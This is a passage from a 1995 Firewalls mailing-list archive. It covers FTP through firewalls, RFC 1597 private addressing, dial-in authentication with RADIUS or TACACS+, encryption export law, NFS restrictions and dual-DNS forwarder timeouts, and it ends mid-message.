(pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA12686; Mon, 2 Oct 1995 16:17:06 -0700 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 2 Oct 1995 16:16:47 -0800 To: Tonny Yu , Firewalls@GreatCircle.Com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Computer ESP Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 2:17 PM 10/2/95, Tonny Yu wrote: >Morning Star Technologies: > >U.Vision Inc introduced a new Internet service, Computer ESP, two weeks >ago. Computer ESP was selected as a Yahoo weekly pick within the first >week of opening. Response has been overwhelming. > >URL: http://www.uvision.com > >Computer ESP is a revolutionary new Internet guide. Anyone on the Internet can >now quickly and easily find comprehensive, organized, up-to-date information on >over 20,000 computer manufacturers and dealers and their products. >Customers can >pre-set some purchasing criteria, such as price, and when it's reached, they >are automatically e-mailed. Customers can also ask for price quotes. You ESP is broken, if you think that "Firewalls@GreatCircle.COM" is the email address for Morning Star Technologies. Congratulations, you've just spammed and annoyed 15,000 or so people on the Firewalls mailing list. I'm sure they'll appreciate your efforts; you've certainly made a memorable first impression... Please remove all references to Firewalls@GreatCircle.COM from your system. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Mon Oct 2 16:53:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA16864 for firewalls-outgoing; Mon, 2 Oct 1995 16:42:44 -0700 Received: from sgi.sgi.com (SGI.COM [192.48.153.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA16845 for ; Mon, 2 Oct 1995 16:42:36 -0700 Received: from yeager.corp.sgi.com by sgi.sgi.com via ESMTP (950405.SGI.8.6.12/910110.SGI) id QAA01207; Mon, 2 Oct 1995 16:39:51 -0700 Received: by yeager.corp.sgi.com (950911.SGI.8.6.12.PATCH825/930416.SGI) id QAA00800; Mon, 2 Oct 1995 16:39:10 -0700 From: lear@yeager.corp.sgi.com (Eliot Lear) Message-Id: <9510021639.ZM798@yeager.corp.sgi.com> Date: Mon, 2 Oct 1995 16:39:09 -0700 In-Reply-To: toon@cem-bb.e-mail.com "RFC 1597" (Oct 2, 8:33am) References: <199510021231.FAA17889@miles.greatcircle.com> Reply-to: lear@palladium.corp.sgi.com X-Mailer: Z-Mail (3.2.1 6apr95 MediaMail) To: toon@cem-bb.e-mail.com, firewalls@greatcircle.com Subject: Re: RFC 1597 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1627 stands on its own; but basically we had three problems with 1597: Procedural - 1597 received 0 review from the ietf. Operational - blindly following 1597 can lead to serious consequences. Architectural - it was a break from the all unique world we lived in. The new draft can be found where you find other Internet Drafts; its title is draft-ietf-cidrd-private-addr-03.txt. It attempts to address the first two of these issues. The third is basically lost. -- Eliot Lear [lear@sgi.com] From firewalls-owner Mon Oct 2 17:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA16016 for firewalls-outgoing; Mon, 2 Oct 1995 16:37:09 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA15847 for ; Mon, 2 Oct 1995 16:36:59 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA28339; Tue, 3 Oct 1995 09:30:37 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma028335; Tue Oct 3 09:30:23 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA14998; Tue, 3 Oct 1995 09:36:16 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510022336.AA14998@citecub.citec.qld.gov.au> Subject: Re: FW to FW FTP w/ no port > 1023 To: wbunting@ch.inri.com (Bill Bunting) Date: Tue, 3 Oct 95 9:36:16 EST Cc: firewalls@greatcircle.com In-Reply-To: <199510022113.RAA02810@hatteras.ch.inri.com>; from "Bill Bunting" at Oct 2, 95 5:13 pm X-Mailer: ELM [version 2.3 PL11] content-length: 2074 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I believe the only(?) option is to allow incoming connections. The ftp gateway (fro example) sends out a PORT command listing a port > 1023, so the ftp server creates a connection from port 20 to a port > 1023. If you can live with incoming connections to ports > 1023 you can have ftp access. Of course this means tightening up the security on the box(es) receiving those incoming connections. On a bastion host the only things listening on ports > 1023 will be the ftp gateway (on the ones I build). Colin > [chomp] > > Things I have considered. > ------------------------- > 1. Poke a hole in the firewall and allow FTP data connections on port 20 > (ftp-data). FTP client would be reprogrammed to use port 20 for data > connections. Issues: Multiple concurrent FTP client listen requests could > get swapped. (What happens in the FTP implementation when this occurs?) > > 2. Poke a range of holes in the firewall. Reprogram the FTP client to look > for free ports within the range. Issues: Still required to poke several > holes in the firewall, requires custom FTP software. Benefit: listen > requests will not be swapped. (Best solution that I can find do far) > > 3. Do not use FTP and write a TCP application that uses only a single TCP > port for data and control. Issues: Time + $$ no compatibility. Benefit: > solves the problem. > > 4. Am I missing something??? Help. How are other people doing this?? Do > most people just allow ports > 1023?? > > Thank you, > --------------------------------------- > | Bill Bunting, Software Engineer | ****** > |Inter-National Research Institute, Inc.| ***_******_ __ _ > | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= > | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== > | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== > | (wbunting@inri.com) | ********* > | (bunting@cs.odu.edu) | ***** > | http://www.cs.odu.edu/~bunting | > --------------------------------------- > > From firewalls-owner Mon Oct 2 17:24:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18582 for firewalls-outgoing; Mon, 2 Oct 1995 17:05:31 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA18565 for ; Mon, 2 Oct 1995 17:05:26 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id TAA00382 for ; Mon, 2 Oct 1995 19:03:58 -0500 Received: from MACCVM.CORP.MOT.COM (maccvm.corp.mot.com [129.188.244.1]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id TAA28564 for ; Mon, 2 Oct 1995 19:03:57 -0500 Received: from MACCVM by MACCVM.CORP.MOT.COM (IBM VM SMTP V2R3) with BSMTP id 3955; Mon, 02 Oct 95 17:03:56 MST Date: 02 Oct 1995 17:03:55 -0700 Message-ID: <"XOPR85 95/10/03 00:03:55.546532"@MACCVM.CORP.MOT.COM> From: Jacob Hinther To: Firewalls Subject: Web Browser Test Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Test your web browser! http://www.c2.org/ http://www.c2.org/hackmsoft/ http://www.c2.org/hacknetscape/ Jake From firewalls-owner Mon Oct 2 17:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA19844 for firewalls-outgoing; Mon, 2 Oct 1995 17:25:29 -0700 Received: from bass.com.my (bass.com.my [161.142.248.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA19823 for ; Mon, 2 Oct 1995 17:25:20 -0700 Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA05844 (5.67a/IDA-1.5 for ); Tue, 3 Oct 1995 08:24:27 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA02389; Tue, 3 Oct 95 08:22:02 MYT Date: Tue, 3 Oct 1995 08:20:43 +0800 (MYT) From: Tham Huei Hwan Subject: Re: Public Domain FireWall Software To: Marcus Antonio - Projeto ISODE Cc: FireWalls In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, You can obtain fwtk(firewalls tool kit) from ftp.tis.com On Fri, 29 Sep 1995, Marcus Antonio - Projeto ISODE wrote: > > Helo FireAlls > > My name's Marcus Antonio, and I'm a Coputer Science student at > Brasil, and I have to implement a network security system. I'd like to know > how can I get some public domain FireWall software. I work with AIX system. > Any information wold be very important. > > Thank you very much... > > > _______________________________________________________________________________ > > _/_/_/_/ _/_/_/_/ > _/_/_/_/ _/_/_/_/ > _/_/ _/_/ _/_/ _/_/ _/_/_/_/ _/_/_/_/ _/_/_/_/ _/ _/ _/_/_/ > _/_/ _/_/_/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ > _/_/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ > _/_/ _/_/ _/_/_/_/ _/ _/_/ _/ _/ _/ _/_/_/_/ > _/_/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ > _/_/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/_/_/ _/_/_/_/ > > Marcus Antonio Almeida Rodrigues > > UECE > Universidade Estadual do Ceara' > > LAR > Laboratorio Multiinstitucional de Redes e Sistemas Distribuidos > > > e-Mail:marcus@fortal.uece.br > URL: http://www.uece.br/~marcus/ > _______________________________________________________________________________ > From firewalls-owner Mon Oct 2 19:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA23692 for firewalls-outgoing; Mon, 2 Oct 1995 19:05:13 -0700 Received: from border.com (janus.border.com [199.71.190.98]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA23685 for ; Mon, 2 Oct 1995 19:05:06 -0700 Received: by janus.border.com id <4998>; Mon, 2 Oct 1995 22:16:48 -0400 To: todd@lgt.com (Todd Glassey) Subject: Re: Information, We want information Cc: firewalls@GreatCircle.COM, gated-people@gated.cornell.edu, cypherpunks@toad.com, glenn@border.com Date: Mon, 2 Oct 1995 22:03:06 -0400 From: Glenn Mackintosh Message-Id: <95Oct2.221648edt.4998@janus.border.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: todd@lgt.com (Todd Glassey) > I an immediate need of info on the liabilities of BSD type systems, and in > particular the BorderWare products. > > I heard that in the BorderWare product itself, there are several recently > discovered potential "holes"... > > I have a particular interest in both the Attack MO against the BSD > platforms in general and the Border products in particular... > > Please do not send the reply to the lists but to me personally > (todd@lgt.com). I will summarize if I get enough info to be worth the > effort. > > Any comments? Let me make a very clear statement. No site protected by BorderWare has ever had its Firewall penetrated. Never. This is the second time I've heard rumors about insecurities in the BorderWare software with nothing being brought out to substantiate them. I guess this is just an unfortunate part of doing business - especially in the security domain. I get a bit annoyed by this kind of thing since, regardless of whether we refute such comments, after the discussion itself is forgotten people will often remember that they heard something about a problem with product X. This isn't a criticism of you Todd - you are just reporting that you've heard rumors and asking about them, which is a perfectly reasonable thing to do. Obviously the rumors you heard haven't come along with any facts since you're asking here for the "Attack MO". I would very much like to here about any problem that is real, since if there were any weaknesses we would want to fix them and disseminate the fix as fast as possible. Border takes any potential problem very seriously. A couple of months ago there was a potential weakness that was discovered in the process of Border's ongoing efforts to ensure the security of the product. It was only a security risk with a very specific configuration. No customer has ever reported seeing this. Within two days of this discovery we had a fix and the fix was being actively pushed through the distribution channels to the customer base. It was given high priority and we had our support people calling down to the reseller channels to ensure that they were aware and that they got it out to their clients. We intended to make sure that this potential problem was immediately removed from the firewall even though no one had actually reported a problem. The fix was given free of charge to anyone whether they had a support contract or not. Some customers were even upgraded to a newer version of BorderWare so they could receive the fix. We strongly believe that our customers are entitled to the best available protection. They bought a Firewall for security and they should expect it to be secure. Border will do everything that we can to ensure this is always the case. So, anyone out there if you believe you have some real attack mechanism we want to know. Now that you've sat through the general ranting part of my comments, let me try to answer the BSD specific part. As far as BSD based OS's in general I don't think there is reason to believe that they are any more or less secure than System V based Unix's (or other non-Unix based operating systems for that matter). They all have pro's and con's and they have all had problems and I don't think that one variant has had more problems historically than the other. That said, Border doesn't use a stock BSD based OS anyway. We have put a large amount of effort into "hardening" the kernel so that it is a solid base upon which to build a secure firewall. We don't believe that any stock OS which was designed for a dynamic environment with users on it will really be secure. There are far too many instances (with just about any OS, Unix or otherwise) where someone has gained privilege or increased access to a system by taking advantage of some feature once they managed to get on the box. A firewall should be a static, non-user environment which means that many features are just not required and can be removed or their behavior significantly changed and limited. We spent a considerable amount of manpower stripping down the kernel and leaving only what was really needed. We removed the mechanisms which can be used to gain privilege or increase the levels of access to the system. The BorderWare kernel is in fact one of its strongest assets, and not a potential weakness. Glenn Mackintosh V.P. Technology ------------------------------------------------------------------------ Border Network Technologies Inc. Email: glenn@border.com 20 Toronto Street, Suite 400, Tel: +1 416 368 7157 Toronto, Ontario, Canada, M5C 2B8 Fax: +1 416 368 7789 From firewalls-owner Mon Oct 2 21:52:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA27528 for firewalls-outgoing; Mon, 2 Oct 1995 21:34:03 -0700 Received: from commsun.its.csiro.au (commsun.its.csiro.au [152.83.8.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA27514 for ; Mon, 2 Oct 1995 21:33:56 -0700 Received: (from fit106@localhost) by commsun.its.csiro.au (8.6.10/8.6.10) id OAA06267; Tue, 3 Oct 1995 14:31:51 +1000 Date: Tue, 3 Oct 1995 14:31:48 +1000 (EST) From: Kent Fitch To: firewalls@greatcircle.com Subject: securing modem access: RADIUS or TACACS+ with PGP authentication Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The organisation I work for is geographically dispersed with Internet connections in major cities in Australia. We are thinking of establishing dial-up modem pools in major cities which travelling staff in hotels or locals at home can use to connect to our WAN and the internet. Both RADIUS and TACACS+ seem attractive, as I think they would allow us to establish a central authentication service to vet dial-in access. We are experimenting with PGP based authentication systems for other purposes, so the option of using a similar mechanism for dial-in authentication would be interesting. >From a browse-thru of the RADIUS doco, I cant see how it would accomodate a challenge-response, such as we might want to use for PGP authentication (we send out a non-repeating challenge, the user signs it with their PGP private key, we check the signature). We currently have a mix of dial-in access boxes - Annex, Cisco and Shiva (maybe others). I am interested in the experiences of others using RADIUS or TACACS+, especially anyone using them with s/key, PGP, or some other software challenge/response system with different access servers. Vendor responses are welcome - I'll summarize to the list. Kent Fitch Ph: +61 6 276 6711 ITSB CSIRO Canberra Australia kent.fitch@its.csiro.au From firewalls-owner Mon Oct 2 22:52:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA29081 for firewalls-outgoing; Mon, 2 Oct 1995 22:45:34 -0700 Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA29074 for ; Mon, 2 Oct 1995 22:45:30 -0700 Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA02180; Tue, 3 Oct 1995 00:43:09 -0500 Date: Tue, 3 Oct 1995 00:43:09 -0500 Message-Id: <9510030543.AA02180@hosaka.smallworks.com> From: Jim Thompson To: Kent.Fitch@its.csiro.au Cc: firewalls@GreatCircle.COM, jes@SmallWorks.COM In-Reply-To: (message from Kent Fitch on Tue, 3 Oct 1995 14:31:48 +1000 (EST)) Subject: Re: securing modem access: RADIUS or TACACS+ with PGP authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Tue, 3 Oct 1995 14:31:48 +1000 (EST) > From: Kent Fitch > The organisation I work for is geographically dispersed with Internet > connections in major cities in Australia. We are thinking of > establishing dial-up modem pools in major cities which travelling staff > in hotels or locals at home can use to connect to our WAN and the internet. > > Both RADIUS and TACACS+ seem attractive, as I think they would allow us to > establish a central authentication service to vet dial-in access. We are > experimenting with PGP based authentication systems for other purposes, so > the option of using a similar mechanism for dial-in authentication would > be interesting. > > From a browse-thru of the RADIUS doco, I cant see how it would accomodate > a challenge-response, such as we might want to use for PGP authentication > (we send out a non-repeating challenge, the user signs it with their PGP > private key, we check the signature). > > We currently have a mix of dial-in access boxes - Annex, Cisco > and Shiva (maybe others). > > I am interested in the experiences of others using RADIUS or TACACS+, > especially anyone using them with s/key, PGP, or some other software > challenge/response system with different access servers. Vendor > responses are welcome - I'll summarize to the list. I'm one-half, (Jes is the other half), of the team implementing Cisco's commercial TACACS+ server. (e.g. we're under contract to Cisco.) It wouldn't be very hard at all to roll PGP into the 'side' of the server. S/Key already works. Smallworks also makes and sells 'Netgate', a filtering firewall for SunOS 4.1.X and Solaris 2.X, in case you've not heard of us before. If you want to take this off-line and discuss it, we'd me more than happy to do so. Cheers, Jim From firewalls-owner Mon Oct 2 23:52:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA00422 for firewalls-outgoing; Mon, 2 Oct 1995 23:34:13 -0700 Received: from loke.btj.se (loke.btj.se [192.36.60.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA00415 for ; Mon, 2 Oct 1995 23:34:09 -0700 Received: (from goran@localhost) by loke.btj.se (8.6.11/8.6.11) id HAA17208; Tue, 3 Oct 1995 07:32:02 +0100 Date: Tue, 3 Oct 1995 07:32:02 +0100 (NFT) From: Goran Svensson To: Bernhard Schneck cc: gblolmxb@ibmmail.com, firewalls@GreatCircle.COM Subject: Re: [none] In-Reply-To: <199510021816.TAA10902@grizzly.genua.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 2 Oct 1995, Bernhard Schneck wrote: > > Frank Willoughby wrote that when sending encrypted mail to a French > > destination, one must supply the French Gov. with a key. If I, based > > in London, England, were to send an encrypted (say using PGP with a > > 1024 bit key) to someone in France, and the French state found out, > > who would they prosecute? They cant touch me, and all the recipient > > has to prove is that the message was unsolicited - or am I missing > > something here? > > Yes ... your next visit to the Cote du Rhone ... Don't forget that the french govement does not respect state borders, if you repeat the 'offense' they might send an amateur hit team to slap you on the fingers. They have done so in the past, and I suspect that they have not learned more about international politics since then. For more details about the events, please contact your nearest Greenpeace representant ...... > > \Bernhard. > > PS: This holds even if you send from London to me in Munich and the > packets happen to hop through France. > > PPS: I understand this is current law, but not actively prosecuted > > PPPS: I'm not a lawyer (and will never be one) > ---------------------------------------------+--------------------------------- Goran Svensson ! I can speak for myself, and I do BTJ System AB +--------------------------------- Email: goran@btj.se ! This is my opinion. I reserve Snail: Box 4066, S-227 21 Lund, Sweden ! the right to change it, doubt it Phone: +46 46 180 000, Fax: +46 46 180 333 ! or deny it at any time. ---------------------------------------------+--------------------------------- Believe nothing, no matter where you read it, or who said it, no matter if I have said it, unless it agrees with your own reason and your own common sense. --Buddha From firewalls-owner Tue Oct 3 00:00:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA00666 for firewalls-outgoing; Mon, 2 Oct 1995 23:55:08 -0700 Received: from quord.agric.nsw.gov.au (quord.agric.NSW.GOV.AU [148.145.15.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA00656 for ; Mon, 2 Oct 1995 23:55:03 -0700 From: neal.sievwright@smtpgwy.agric.nsw.gov.au Received: from spock.agnet.nis (spock.agric.NSW.GOV.AU) by quord.agric.nsw.gov.au (4.1/SMI-4.1) id AA29676; Tue, 3 Oct 95 16:55:10 EST Received: from smtpgwy.agric.nsw.gov.au by spock.agnet.nis (5.0/SMI-SVR4) id AA15540; Tue, 3 Oct 1995 16:57:45 --1000 Received: from cc:Mail by smtpgwy.agric.nsw.gov.au id AA812764551; Tue, 03 Oct 95 16:45:26 EST Date: Tue, 03 Oct 95 16:45:26 EST Encoding: 1 Text Message-Id: <9509038127.AA812764551@smtpgwy.agric.nsw.gov.au> To: Content-Length: 14 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk signoff From firewalls-owner Tue Oct 3 00:27:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA00808 for firewalls-outgoing; Tue, 3 Oct 1995 00:00:59 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA00801 for ; Tue, 3 Oct 1995 00:00:54 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Tue, 3 Oct 1995 07:59:08 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3070E58A@smtpgty.saicuk.co.uk>; Tue, 03 Oct 95 07:26:02 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: RE: Encryption strength (Was How secure is a WAN...) Date: Mon, 02 Oct 95 10:37:00 GMT Message-ID: <3070E58A@smtpgty.saicuk.co.uk> Encoding: 103 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Having taken time out to finish a book for a publishing deadline and not having had time to follow some discussion groups, I have resubscribed to firewalls and see most of the topics are the same as earlier in the year. Risk is still refered to as 'theoretical', but encryption, which some had complained was not applicable to firewalls, is now under discussion. Sorry if I missed some important points while unsubscribed. Risk management is not theoretical, at least no more so than any other human activity, if it is addressed correctly. There really is not too much benefit in trying to meet a risk which may not apply. The danger of the firewall is that it looks like a simple solution to every problem and once you have one it is very easy to spend more and more time (and money) adding the latest fashion gismo to it. As many firewall buyers/influencers are sysads its understandable that they approach the subject from the relatively narrow perspective of the information systems department and consider it as a technical issue. Thats a bit like fitting an engine imobiliser to the car when the real risk may be someone smashing a window to grab valuables left in full view on the back seat. It may well be that every user who connects to any of the information highways needs some type of protective barrier, and equally that they may need to protect their data as it transits the cloud, but thats only part of the risk addressed and, statistically, its probably a lower priority against other risks. By assuming that the firewall is the starting point is much like the concept of the ancient walled city where the greater risk might have been plague and fire and the walls sometimes increased those risks. The defensive wall also didnt provide complete protection from the external attacker because a strong attacker either broke through the wall or waited for the inhabitants to starve. It many cases, the money might have been better spent on a fast charriot the better to head for the hills. The probability is that most email traffic from most sites has no real value other than as conversation between two people and may not justify any encryption costs. Equally, some traffic may be a small percentage of the total but be highly sensitive. That could mean that a system needs several levels of encryption strength, but it might mean that some communication simply cant be carried out electronically. As the vast majority of data users have no method of segregating data internally and maintaining access only for authorised users, any user may be able to access any data, anytime, and export it to any address. Having the ability to strongly encrypt what is transmitted will not prevent someone sending information deliberately to someone who should not receive it. It will also not prevent an employee from accessing a recreational service during company time. There are solutions which can be applied if the risk factors justify the cost and those solutions will almost certainly require some form of firewall and some form(s) of encryption and authentication. A problem which applies to encryption, and other effective risk reduction technology, is the fact that legislators have failed miserably to keep up with technical innovation. The mess over encryption is just one example of government in confusion. As much of the information technology originates in the US, the US Federal Government plays a major role in this confusion. ITAR is only one example. Much of the import and export controls originate in the 'cold war' period and applied to much older technologies but have yet to be replaced by new legislation which addresses today's realities. From years of experience, I know that obtaining licenses is not really that difficult, but can take a considerable time to complete. There are some end users and applications which wont allow you to obtain a license, but its not as restrictive as many people claim. Certainly its much easier to get a G-Dest license on a government to government basis and some governments are more favoured by US Fed than others. US regulations have recently changed and one consequence is the need for any company wanting to import or export 'munitions' to register which is not necessarily any major problem but is an essential step. I did notice a posting which suggested than many governments are all set to ban encryption and there have been postings on other discussion groups which make similar claims, particularly citing a document issued by the British Labour Party. I have to say that this doesnt tie in with what I have experienced. Over the years I have spoken with officials and politicians in a number of countries, including the US, on encryption and associated topics. I have also had recent discussions as part of the research for a book specifically on attitudes to data protection and served on some working parties. The general response I have got is that governments recognise the legitimate requirement to protect information from theft and abuse and accept that this implies a need for encryption to give similar data protection to that provided by well established non-electronic communications systems. What worries them is that criminals can use the same technology to defeat crime prevention efforts. One example frequently cited is the availability of pornography over systems like the Internet. It is also realised that drug dealers and many other categories of criminal are often equipped with better technology than the law enforcement agencies, but then thats nothing new and goes back much further than the Thompson submachine gun. What most governments are looking for is a way by which they can decrypt data when there is justification to do so, much in the same way that telephones are tapped. Some governments may of course be more cautious about how much they use the facility than others. If these views are combined with military export rules, the result can be that the legitimate user suffers much more than the criminal and the only answer is to lobby your politicians to make sure they understand your needs. Many officials and politicians already understand that high communications availability is essential to business growth and success, and creates wealth. They also understand that this facility must be reliable and secure, so part of the battle is won. What often confuses issues is vested interests trying very hard to push their flavour of technology, rather than presenting a risk and benefits analysis to support their position. Ian J-B From firewalls-owner Tue Oct 3 01:22:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA02147 for firewalls-outgoing; Tue, 3 Oct 1995 01:02:02 -0700 Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA02139 for ; Tue, 3 Oct 1995 01:01:59 -0700 From: gblolmxb@ibmmail.com Message-Id: <199510030801.BAA02139@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 0023; Tue, 03 Oct 95 03:59:57 EDT Date: Tue, 03 Oct 1995 04:03:46 EDT To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, Whenever I post to this list, my messages appear without a title - is there any reason for this? any other SMTP mail gets delivered OK. Mark. From firewalls-owner Tue Oct 3 01:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA02460 for firewalls-outgoing; Tue, 3 Oct 1995 01:13:50 -0700 Received: from clemens.dwf.com (clemens.dwf.com [204.134.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA02447 for ; Tue, 3 Oct 1995 01:13:39 -0700 Received: (from reg@localhost) by clemens.dwf.com (8.6.10/8.6.9) id CAA03698 for firewalls-digest@GreatCircle.com; Tue, 3 Oct 1995 02:11:25 -0600 Date: Tue, 3 Oct 1995 02:11:25 -0600 From: Reg Clemens Message-Id: <199510030811.CAA03698@clemens.dwf.com> To: firewalls-digest@GreatCircle.com Subject: NFS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am sure that this topic has been beaten to death, so if someone would just point me at the discussion (or tell me that there is no solution) I would be happy to take it from there. I remember reading a paper a couple years ago describing why NFS could never be made secure, but for the life of me I cant seem to find it now. The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half dozen file systems that are exported read-only to all the other machines in the domain. I would like to restrict their mounting to machines within the domain while maintaining connectivity to the outside world. SUN's software does not support this option, it only allows specifying specific machine names, and the list of *all* machine names overflows some internal limit in SUN's software. [ The machine uses DNS and not YP, it is rumored that possibly with YP one can get by this limit, but I have no interest in adding YP to my list of problems. ] So, the Questions (1) WITHOUT resorting to a firewall, is there any way to accomplish what I want to do? (2) If not, can it be done with a `simple' packet filter, or does it require a full blown firewall? Reg.Clemens clemens@dwf.com From firewalls-owner Tue Oct 3 01:48:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA03024 for firewalls-outgoing; Tue, 3 Oct 1995 01:17:02 -0700 Received: from gatekeeper.frontec.se (gatekeeper.frontec.se [193.13.192.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA03007 for ; Tue, 3 Oct 1995 01:16:55 -0700 Received: from tintin.lule.frontec.se (root@tintin.lule.frontec.se [192.36.15.4]) by gatekeeper.frontec.se (8.6.12/8.6.6) with SMTP id JAA06837 for ; Tue, 3 Oct 1995 09:15:22 +0100 Received: from lobo.lule.frontec.se by tintin.lule.frontec.se with SMTP id AA17006 (5.67a8/IDA-1.5 for ); Tue, 3 Oct 1995 09:15:17 +0100 Date: Tue, 3 Oct 1995 09:15:17 +0100 From: Petter H{ggman Message-Id: <199510030815.AA17006@tintin.lule.frontec.se> To: Firewalls@GreatCircle.COM Subject: Re: Dual-DNS Problems X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk cris@dejong.com wrote: > Back with more dual-DNS problems. > > Background: DNS server 1 is internal DNS, can't reach the real > world directly, but can reach server 2. Server 2 is external DNS > and 'forwarder' for internal DNS server 1. > > Situation 1: DNS server 1 'slave' flag in named.boot is *not > present*. DNS resolves are done quickly and correctly the first > time, but server 1 keeps generating UDP packets aimed at outside > servers (which can't reach outside of the secure net). > When using a forwarder without the 'slave' directive, the inside DNS will only wait for a 'short' time, before trying to resolve the name/ address itself, which it of course can't.. :-} > Situation 2: DNS server 1 'slave' flag in named.boot *is* present. > Non-cached DNS resolves requested by internal hosts often > (usually?) fail on the 1st tty, and sometimes on the 2nd, but > almost always resolve on the 3rd try. No UDP packets from server 1 > are aimed at real-world servers. > When using the 'slave' directive, if the outside DNS needs to resolve the name/address (i.e it's not cached) it takes some time, during which the internal DNS may/will timeout. > Sounds like a timeout problem, but this doesn't make sense, because > the timeout should happen in Situation #1 as well. *Why* is this > happening? Any help... TIA. > It happens in the first case as I stated above. The problem in a nutshell is that the timeout is too short, but who wants to change the source? My "trick" to fix this is to repeat the forwarder address in the forwarder directive together with the 'slave' directive. Ex. 'forwarder 193.10.10.1 193.10.10.1 193.10.10.1' 'slave' This means the slave DNS will "ask" three times, and before the third question is done the answer to the first arrives..:-) (Of course you may repeat the address as many times as you like, but in our network three times works like a 